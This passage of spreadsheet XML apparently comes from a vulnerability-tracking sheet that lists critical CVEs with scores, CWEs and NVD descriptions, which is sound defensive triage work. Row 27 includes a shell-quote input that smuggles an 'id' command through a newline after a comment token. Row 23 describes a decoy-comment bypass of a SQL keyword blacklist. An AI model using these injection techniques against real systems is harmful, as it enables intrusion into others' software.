      <c r="L19" s="5" t="inlineStr"/>
      <c r="M19" s="5" t="inlineStr"/>
      <c r="N19" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O19" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P19" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q19" s="5" t="inlineStr"/>
      <c r="R19" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S19" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - ordasoft.com - Unauthenticated SQL Injection in Real Estate Manager (Free) &lt; 6.7.9 - site/realestatemanager.php builds the ORDER BY clause of three separate frontend property-listing queries (category browsing, search results, and the full property listing) from a request-controlled order_field parameter, concatenated directly into an unquoted SQL clause with no allow-list of real column names and no cast.</t>
        </is>
      </c>
      <c r="T19" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100752</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B20" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C20" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101039</t>
        </is>
      </c>
      <c r="D20" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E20" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F20" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G20" s="5" t="inlineStr"/>
      <c r="H20" s="5" t="inlineStr"/>
      <c r="I20" s="5" t="inlineStr"/>
      <c r="J20" s="5" t="inlineStr"/>
      <c r="K20" s="5" t="inlineStr"/>
      <c r="L20" s="5" t="inlineStr"/>
      <c r="M20" s="5" t="inlineStr"/>
      <c r="N20" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O20" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P20" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q20" s="5" t="inlineStr"/>
      <c r="R20" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-121</t>
        </is>
      </c>
      <c r="S20" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in FAST FAC1900R 20190827_2.0.2. Affected by this issue is the function copy_msg_element of the component devdiscover Service. Such manipulation leads to stack-based buffer overflow. The attack can be executed remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T20" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101039</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B21" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C21" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101075</t>
        </is>
      </c>
      <c r="D21" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E21" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F21" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G21" s="5" t="inlineStr"/>
      <c r="H21" s="5" t="inlineStr"/>
      <c r="I21" s="5" t="inlineStr"/>
      <c r="J21" s="5" t="inlineStr"/>
      <c r="K21" s="5" t="inlineStr"/>
      <c r="L21" s="5" t="inlineStr"/>
      <c r="M21" s="5" t="inlineStr"/>
      <c r="N21" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O21" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P21" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q21" s="5" t="inlineStr"/>
      <c r="R21" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="S21" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in Netcore NR289-GE 1.4.5102. The impacted element is the function system of the file /location_time.cgi of the component Location Time Handler. The manipulation of the argument mac leads to os command injection. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T21" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101075</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B22" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C22" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101108</t>
        </is>
      </c>
      <c r="D22" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E22" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F22" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G22" s="5" t="inlineStr"/>
      <c r="H22" s="5" t="inlineStr"/>
      <c r="I22" s="5" t="inlineStr"/>
      <c r="J22" s="5" t="inlineStr">
        <is>
          <t>php, go, hp</t>
        </is>
      </c>
      <c r="K22" s="5" t="inlineStr"/>
      <c r="L22" s="5" t="inlineStr"/>
      <c r="M22" s="5" t="inlineStr"/>
      <c r="N22" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O22" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P22" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q22" s="5" t="inlineStr"/>
      <c r="R22" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S22" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - ordasoft.com - Unauthenticated SQL Injection in Vehicle Manager (Free) &lt; 6.5.8 - site/vehiclemanager.php reads the order_field and order_direction sort parameters at three separate anonymous-reachable frontend entry points (category listing, search, and the all-vehicles listing) through a sanitizing function that applies real escaping, but the value is then placed into an unquoted ORDER BY clause, where escaping has no protective effect.</t>
        </is>
      </c>
      <c r="T22" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101108</t>
        </is>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B23" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C23" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101110</t>
        </is>
      </c>
      <c r="D23" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E23" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F23" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G23" s="5" t="inlineStr"/>
      <c r="H23" s="5" t="inlineStr"/>
      <c r="I23" s="5" t="inlineStr"/>
      <c r="J23" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K23" s="5" t="inlineStr"/>
      <c r="L23" s="5" t="inlineStr"/>
      <c r="M23" s="5" t="inlineStr"/>
      <c r="N23" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O23" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P23" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q23" s="5" t="inlineStr"/>
      <c r="R23" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S23" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - ordasoft.com - Unauthenticated SQL Injection in Book Library (Free) &lt; 6.4.6 - site/booklibrary.php’s books() function reads the field and direction request parameters and passes each through a function called protectInjectionWithoutQuote(), whose only real protection is a keyword blacklist that, on detecting the literal substring select, wraps the value in $db-&gt;quote() instead of rejecting it. The value is then concatenated directly into an unquoted ORDER BY clause, a position where quoting provides no protection at all. Reaching the vulnerable code path requires two conditions: a first request to prime session-stored sort defaults, and a trailing decoy comment (-- xselect) that satisfies the blacklist’s substring check without altering the payload’s effect.</t>
        </is>
      </c>
      <c r="T23" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101110</t>
        </is>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B24" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C24" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101891</t>
        </is>
      </c>
      <c r="D24" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E24" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F24" s="5" t="inlineStr">
        <is>
          <t>5d1c2695-1a31-4499-88ae-e847036fd7e3</t>
        </is>
      </c>
      <c r="G24" s="5" t="inlineStr"/>
      <c r="H24" s="5" t="inlineStr"/>
      <c r="I24" s="5" t="inlineStr"/>
      <c r="J24" s="5" t="inlineStr"/>
      <c r="K24" s="5" t="inlineStr"/>
      <c r="L24" s="5" t="inlineStr"/>
      <c r="M24" s="5" t="inlineStr"/>
      <c r="N24" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O24" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P24" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q24" s="5" t="inlineStr"/>
      <c r="R24" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-923</t>
        </is>
      </c>
      <c r="S24" s="5" t="inlineStr">
        <is>
          <t>An improper access control vulnerability in an internal API service on WatchGuard Access Points allows an unauthenticated attacker with network access to the AP to obtain a valid API session.</t>
        </is>
      </c>
      <c r="T24" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101891</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B25" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C25" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73640</t>
        </is>
      </c>
      <c r="D25" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E25" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F25" s="5" t="inlineStr">
        <is>
          <t>cvd@cert.pl</t>
        </is>
      </c>
      <c r="G25" s="5" t="inlineStr"/>
      <c r="H25" s="5" t="inlineStr"/>
      <c r="I25" s="5" t="inlineStr"/>
      <c r="J25" s="5" t="inlineStr"/>
      <c r="K25" s="5" t="inlineStr"/>
      <c r="L25" s="5" t="inlineStr"/>
      <c r="M25" s="5" t="inlineStr"/>
      <c r="N25" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O25" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P25" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q25" s="5" t="inlineStr"/>
      <c r="R25" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S25" s="5" t="inlineStr">
        <is>
          <t>Dayforce Payroll is vulnerable to Time Based-Blind SQL Injection in password recovery functionality. The unauthenticated attacker can prepare GET request with one of the parameters filled in with an arbitrary SQL query. The parameter is interpreted as part of SQL predicate resulting in Time-Based Blind SQL Injection.
Because vendor contact attempts were unsuccessful, the vulnerability has only been confirmed in version R2026.2.0 but may also affect other versions.</t>
        </is>
      </c>
      <c r="T25" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73640</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B26" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C26" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86102</t>
        </is>
      </c>
      <c r="D26" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E26" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F26" s="5" t="inlineStr">
        <is>
          <t>5d1c2695-1a31-4499-88ae-e847036fd7e3</t>
        </is>
      </c>
      <c r="G26" s="5" t="inlineStr"/>
      <c r="H26" s="5" t="inlineStr"/>
      <c r="I26" s="5" t="inlineStr"/>
      <c r="J26" s="5" t="inlineStr"/>
      <c r="K26" s="5" t="inlineStr"/>
      <c r="L26" s="5" t="inlineStr"/>
      <c r="M26" s="5" t="inlineStr"/>
      <c r="N26" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O26" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P26" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q26" s="5" t="inlineStr"/>
      <c r="R26" s="5" t="inlineStr">
        <is>
          <t>CWE-78, CWE-863</t>
        </is>
      </c>
      <c r="S26" s="5" t="inlineStr">
        <is>
          <t>An OS command injection vulnerability in the WatchGuard AP internal API service allows an attacker with network access to the AP to execute arbitrary shell commands on the underlying operating system.</t>
        </is>
      </c>
      <c r="T26" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86102</t>
        </is>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B27" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C27" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102422</t>
        </is>
      </c>
      <c r="D27" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E27" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F27" s="5" t="inlineStr">
        <is>
          <t>7ffcee3d-2c14-4c3e-b844-86c6a321a158</t>
        </is>
      </c>
      <c r="G27" s="5" t="inlineStr"/>
      <c r="H27" s="5" t="inlineStr"/>
      <c r="I27" s="5" t="inlineStr"/>
      <c r="J27" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K27" s="5" t="inlineStr"/>
      <c r="L27" s="5" t="inlineStr"/>
      <c r="M27" s="5" t="inlineStr"/>
      <c r="N27" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O27" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P27" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q27" s="5" t="inlineStr"/>
      <c r="R27" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S27" s="5" t="inlineStr">
        <is>
          <t>shell-quote's `quote()` function emits a `{ comment }` token as `#` followed by its text, which comments out the rest of the shell line, including the opening quote of any later string token. A line terminator (\n, \r, U+2028, U+2029) in that later string therefore ends the comment, and the rest of the string is parsed as shell input: `quote(['echo', 'ok', { comment: 'x' }, 'a\nid;#'])` runs `id` in sh, bash, dash, ksh and zsh. `parse()` emits a comment token for a `#` in the middle of a word (for example `http://example.com/#frag`), so callers that combine `parse()` output with another untrusted string, such as `quote(parse(untrustedCommand).concat(untrustedArg))`, are affected. The fix for CVE-2026-9277 rejected line terminators in the comment's own text, but not in the tokens after it. Fixed in 1.11.0: `quote()` throws a `TypeError` when a string after a `{ comment }` token contains a line terminator.</t>
        </is>
      </c>
      <c r="T27" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102422</t>
        </is>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B28" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C28" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73642</t>
        </is>
      </c>
      <c r="D28" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E28" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F28" s="5" t="inlineStr">
        <is>
          <t>cvd@cert.pl</t>
        </is>
      </c>
      <c r="G28" s="5" t="inlineStr"/>
      <c r="H28" s="5" t="inlineStr"/>
      <c r="I28" s="5" t="inlineStr"/>
      <c r="J28" s="5" t="inlineStr"/>
      <c r="K28" s="5" t="inlineStr"/>
      <c r="L28" s="5" t="inlineStr"/>
      <c r="M28" s="5" t="inlineStr"/>
      <c r="N28" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O28" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P28" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q28" s="5" t="inlineStr"/>
      <c r="R28" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S28" s="5" t="inlineStr">
        <is>
          <t>Dayforce Payroll is vulnerable to Path Traversal  in file download functionality. An unauthenticated attacker can sent GET request with file path parameter set to any path including an absolute
local file path.
Because vendor contact attempts were unsuccessful, the vulnerability has only been confirmed in version R2026.2.0 but may also affect other versions.</t>
        </is>
      </c>
      <c r="T28" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73642</t>
        </is>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B29" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C29" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101081</t>
        </is>
      </c>
      <c r="D29" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E29" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F29" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G29" s="5" t="inlineStr"/>
      <c r="H29" s="5" t="inlineStr"/>
      <c r="I29" s="5" t="inlineStr"/>
      <c r="J29" s="5" t="inlineStr"/>
      <c r="K29" s="5" t="inlineStr"/>
      <c r="L29" s="5" t="inlineStr"/>
      <c r="M29" s="5" t="inlineStr"/>
      <c r="N29" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O29" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P29" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q29" s="5" t="inlineStr"/>
      <c r="R29" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-121</t>
        </is>
      </c>
      <c r="S29" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in D-Link DI-8400 16.07. This vulnerability affects the function menu_nat_more_asp of the file menu_nat_more.asp of the component Web Administration Service. The manipulation of the argument opt results in stack-based buffer overflow. The attack can be launched remotely. The exploit has been released to the public and may be used for attacks.</t>
        </is>
      </c>
      <c r="T29" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101081</t>
        </is>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B30" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C30" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101187</t>
        </is>
      </c>
      <c r="D30" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E30" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F30" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G30" s="5" t="inlineStr"/>
      <c r="H30" s="5" t="inlineStr"/>
      <c r="I30" s="5" t="inlineStr"/>
      <c r="J30" s="5" t="inlineStr"/>
      <c r="K30" s="5" t="inlineStr"/>
      <c r="L30" s="5" t="inlineStr"/>
      <c r="M30" s="5" t="inlineStr"/>
      <c r="N30" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O30" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P30" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q30" s="5" t="inlineStr"/>
      <c r="R30" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-77</t>
        </is>
      </c>
      <c r="S30" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in Ziroom ZHOME A0101 1.0.1.0. This vulnerability affects the function pop_usb_device of the file usr/lib/lua/luci/controller/api/zrUsb.lua of the component USB Device Management API. This manipulation of the argument path causes command injection. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T30" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101187</t>
        </is>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B31" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C31" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101260</t>
        </is>
      </c>
      <c r="D31" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E31" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F31" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G31" s="5" t="inlineStr"/>
      <c r="H31" s="5" t="inlineStr"/>
      <c r="I31" s="5" t="inlineStr"/>
      <c r="J31" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K31" s="5" t="inlineStr"/>
      <c r="L31" s="5" t="inlineStr"/>
      <c r="M31" s="5" t="inlineStr"/>
      <c r="N31" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O31" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P31" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q31" s="5" t="inlineStr"/>
      <c r="R31" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-77</t>
        </is>
      </c>
      <c r="S31" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in Ziroom ZHOME A0101 1.0.1.0. Affected by this issue is some unknown functionality of the file /api/ZRnetwork/firstLogin. Performing a manipulation of the argument firstLogin results in command injection. The attack is possible to be carried out remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T31" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101260</t>
        </is>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B32" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C32" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101261</t>
        </is>
      </c>
      <c r="D32" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E32" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F32" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G32" s="5" t="inlineStr"/>
      <c r="H32" s="5" t="inlineStr"/>
      <c r="I32" s="5" t="inlineStr"/>
      <c r="J32" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K32" s="5" t="inlineStr"/>
      <c r="L32" s="5" t="inlineStr"/>
      <c r="M32" s="5" t="inlineStr"/>
      <c r="N32" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O32" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P32" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q32" s="5" t="inlineStr"/>
      <c r="R32" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-77</t>
        </is>
      </c>
      <c r="S32" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in Ziroom ZHOME A0101 1.0.1.0. This affects an unknown part of the file /api/ZRnetwork/firstSetup_wifi. Executing a manipulation of the argument login_pwd can lead to command injection. The attack may be performed from remote. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T32" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101261</t>
        </is>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B33" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C33" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101262</t>
        </is>
      </c>
      <c r="D33" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E33" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F33" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G33" s="5" t="inlineStr"/>
      <c r="H33" s="5" t="inlineStr"/>
      <c r="I33" s="5" t="inlineStr"/>
      <c r="J33" s="5" t="inlineStr"/>
      <c r="K33" s="5" t="inlineStr"/>
      <c r="L33" s="5" t="inlineStr"/>
      <c r="M33" s="5" t="inlineStr"/>
      <c r="N33" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O33" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P33" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q33" s="5" t="inlineStr"/>
      <c r="R33" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-77</t>
        </is>
      </c>
      <c r="S33" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in Ziroom ZHOME A0101 1.0.1.0. This vulnerability affects unknown code of the file /api/ZRQos/set_online_client. The manipulation of the argument ip leads to command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T33" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101262</t>
        </is>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B34" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C34" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101263</t>
        </is>
      </c>
      <c r="D34" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E34" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F34" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G34" s="5" t="inlineStr"/>
      <c r="H34" s="5" t="inlineStr"/>
      <c r="I34" s="5" t="inlineStr"/>
      <c r="J34" s="5" t="inlineStr"/>
      <c r="K34" s="5" t="inlineStr"/>
      <c r="L34" s="5" t="inlineStr"/>
      <c r="M34" s="5" t="inlineStr"/>
      <c r="N34" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O34" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P34" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q34" s="5" t="inlineStr"/>
      <c r="R34" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-77</t>
        </is>
      </c>
      <c r="S34" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in Ziroom ZHOME A0101 1.0.1.0. This issue affects some unknown processing of the file /api/ZRQos/set_online_client. The manipulation of the argument mac results in command injection. It is possible to launch the attack remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T34" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101263</t>
        </is>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
